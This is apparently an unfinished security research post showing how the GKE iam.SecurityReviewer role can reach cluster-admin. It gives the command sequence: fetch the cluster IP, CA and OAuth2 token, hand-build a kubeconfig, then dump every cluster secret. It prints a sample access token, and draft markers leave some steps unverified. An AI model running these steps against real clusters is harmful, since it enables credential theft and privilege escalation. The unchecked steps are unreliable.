GKE iam.SecurityReviewer
Provides permissions to list all resources and Cloud IAM policies on them.
> kubectl get secrets -n kube-system NAME TYPE DATA AGE cluster-admin-token kubernetes.io/service-account-token 3 1d
> kubectl get secret cluster-admin-token -n kube-system` Error from server (Forbidden): secrets "cluster-admin-token" is forbidden: User "security-reviewer@shmoocon-talk-hacking.iam.gserviceaccount.com" cannot get resource "secrets" in API group "" in the namespace "kube-system": requires one of ["container.secrets.get"] permission(s).
>kubectl get secrets -o yaml apiVersion: v1 items: - apiVersion: v1 data: ca.crt: namespace: a3ViZS1zeXN0ZW0K token: kind: Secret ...
Kubernetes List and Get Verbs
For a “List” request, you’ll notice the call looks very similar except that the request isn’t for an individual object, but a group of them.
GET /apis/apps/v1/namespaces/kube-system/secrets
The response returned in a “List” request will include all the same manifests of the “Get” verb. This means there is a permission control to restrict “Get” vs “List” but they effectively have no meaning and can’t be relied upon for security. TKTKI’m using Strong works here. Can someone verifyTKTK
Using iam.SecurityReviewer With Kubeconfig
While all of the above is accurate, in practice, there’s a step that’s missing. The iam.SecurityReviewer role does not have the GCloud IAM permission to “Get” credentials. If you have permissions, you would normally run a command like this:
> gcloud container clusters get-credentials cluster-1
This will go out to the “cluster-1” GKE cluster and pull down necessary information to put into your kubeconfig file so that you can run kubectl commands. It’s a interesting command because gcloud-credential-helper will also make sure that your token is regularly updated in the background.
Here’s an excerpt of what your kubeconfig may look like:
apiVersion: v1 clusters: - cluster: certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURDekNDQWZPZ0F3SUJBZ0lRYndublIvTjVyRVlLSlF5NjRHeFU0ekFOQmdrcWhraUc5dzBCQVFzRkFEQXYKTVMwd0t3WURWUVFERXlSaVpETXpObUkzWWkwd1l6Y3hMVFF5TW1ZdE9XRmpOUzFrT0Rrd05HUXpZMll4TVRrdwpIaGNOTWpBd05UQTNNVE14TWpVNFdoY05NalV3TlRBMk1UUXhNalU0V2pBdk1TMHdLd1lEVlFRREV5UmlaRE16Ck5tSTNZaTB3WXpjeExUUXlNbVl0T1dGak5TMWtPRGt3TkdRelkyWXhNVGt3Z2dFaU1BMEdDU3FHU0liM0RRRUIKQVFVQUE0SUJEd0F3Z2dFS0FvSUJBUURHQmNYSTk3Z3cyclpxUkd0Y0IvRitDUUpmN0NDeE9zbjNaRUdnbzNiQgpiRUZGTmo1WHJsejg4QkY3NzhyTWMvdFF2R2JwZjIwNnR4ME9pRk9zZzJwTU4zMnZUZ2pMVGI0WVBTUGJCZUNOCnlXNTVLSVBVUHhZYi9VeDBITnFmV0g3RUlubUl4Q3FFdzZlNXlDUmdDcS92aWpkaGNJWkowTGFpODhRdlhHdHcKUlVSZWtCS1QxbXhiZk9CNE1IcEhvaHNBbjZ0TUtMWDFKYVV3TlRZVWh3RE83YUpKZEVieWJCSWxWRGE3VFVOMwozNWUwY2xiRjR1TDdGd2NKWUJkdzRhTCtIRkpZNG5Md0tadW9GS29vV3BEZGhXVzRLUndiZ2xMMVJ3Y0RWR09qCjRwajlZcGJPM2d2T3ovZnZ1d0c0MC9pZXNWOURIaklLSGxURzAvMEdwUHlkQWdNQkFBR2pJekFoTUE0R0ExVWQKRHdFQi93UUVBd0lDQkRBUEJnTlZIUk1CQWY4RUJUQURBUUgvTUEwR0NTcUdTSWIzRFFFQkN3VUFBNElCQVFDOApUUlFOMXZaWTUwbU4zWGhxSTJETFdFcEgrWTBlUlBrd0JmdkVoNWpIREkrRmJvV1pZc2lva1ErOURzaXVNMitRCldOUTc2TDlwQ2JXOThlejFJb1pwSjBoRkRPS1dzclVCb1F6R3ZHMDM0S3FHbCtVU3hYUnBaOUd6QWFsV1JpSXoKYTAzRFgzME1jaVBEMXhJaGg1ZTNYNVhORXd6VThqdUNSUFQxSUpaVmRKMzFrNmNUSEZ5c2hnUEhXUzAxRUt6ago2MjlFTXplQTRnZ25UZTB4TDI2eGxHVzRYY0hMckJPL0lVRkVUVEd2enNydkhDenhQOCtObVNuRktwQ1Q3YkNYClNsam1IZUZTU2VyQzR3cFBLWWNwOWx0QjFKRGZicVRSc05rVTVqSFhrMUFBZnJDSWx3K3JIcUZoNHNEeGlQNFQKRzNZODFKZ25qTlZMNXh0aGpTZWsKLS0tLS1FTkQgQ0VSVElGSUNBVEUtLS0tLQo= server: name: gke_hacking-poc_us-central1-c_cluster-1 ... users: - name: gke_hacking-poc_us-central1-c_cluster-1 user: auth-provider: config: access-token: ya29.c.KpYByQcy8QbvVbpJD6OXVYJRfB_q4SOZrhH9oA0VebhJtWgXnGq9oYqTn27S3yyMR5-UEckApAkkm_g-18FOlPDfefwznZq7Lu_w-uORu9jiw378UXDeOvGtHBitCteg2scp24KSeNAs2xLHcUTTDszijCIoUNTLppkGk1P5AJf-wbp5iZdDKP4v8bW32sVSNJmYMkBxKOuU cmd-args: config config-helper --format=json cmd-path: /usr/lib/google-cloud-sdk/bin/gcloud expiry: "2020-05-07T17:41:43Z" expiry-key: '{.credential.token_expiry}' token-key: '{.credential.access_token}' name: gcp
There are 3 key pieces here that we need to pay attention to:
- Server IP: In GKE, this is often a public IP to access the kube-api
- Access Token: This is an OAuth2 token for your gcloud account.
- Certificate Authority: The certificate authority your Kubernetes cluster uses (you can also choose to not validate the CA).
With only the iam.SecurityReviewer role, our accounts have permission to list our clusters and obtain the Server IP.
> gcloud container clusters list
From this IP we can get the certificate authority using openssl
> openssl s_client -connect {CLUSTER-IP}:443 | openssl x509 -pubkey -noout TKTKVERIFY
Finally, we need to get the access token. Our role has permission to get this so we can either run a command like this:
> gcloud auth application-default print-access-token
TKTK Josh?
With these 3 pieces we can build our Kubeconfig file manually without the need for gcloud to “get-credentials” since we don’t have permission to do that:
apiVersion: v1 clusters: - cluster: certificate-authority-data: {BASE64-ENCODED-CA} server: https://{KUBE-API-IP} name: gke_hacking-poc_us-central1-c_cluster-1 ... users: - name: gke_hacking-poc_us-central1-c_cluster-1 user: auth-provider: config: access-token: {OAUTH2-ACCESS-TOKEN} cmd-args: config config-helper --format=json cmd-path: /usr/lib/google-cloud-sdk/bin/gcloud expiry: "2020-05-07T17:41:43Z" expiry-key: '{.credential.token_expiry}' token-key: '{.credential.access_token}' name: gcp
This configures our kubectl so that we can now access the secrets.
Putting It All Together
To summarize, here are the steps to going from iam.SecurityReviewer to Cluster-Admin in GKE:
- Be granted the iam.SecurityReviewer role and configured gcloud
- Discover the Cluster IP by listing the clusters via gcloud
- Grab your OAuth2 token either from a gcloud command or from the environment variable
- Fill out the template Kubeconfig file to grant permission to query the cluster via kubectl
- Extract all the secrets from the cluster with kubectl get secrets --all-namespaces -o yaml > all_cluster_secrets.yaml
- Extract a secret with elevated permissions and build a new Kubeconfig file context to now access the cluster with Cluster-Admin permissions
We are demonstrating how the iam.SecurityReviewer role has a difficult task trying to restrict access to a GKE cluster because Kubernetes provides often misinterpreted API controls. We demonstrated how some of the constraints for how gcloud will control authentication and ways to get around it. One of points we’d like to again emphasize is that the Kubernetes Secrets API returns the secrets even if you only have “List” permissions so while we’re directing our attention at Google’s GKE platform, the Kubernetes API has to share some blame here. If Kubernetes differentiates between a “List” permission and a “Get” permission, it should make sure that the results of a List do not return full manifests the same as a Get.
As more cloud providers aim to tackle integrating the cloud IAM services to match up with their managed Kubernetes clusters’ permissions, they will continue to run into these problems. In a future post, Jack Leadford will be discussing some security challenges of kube2iam.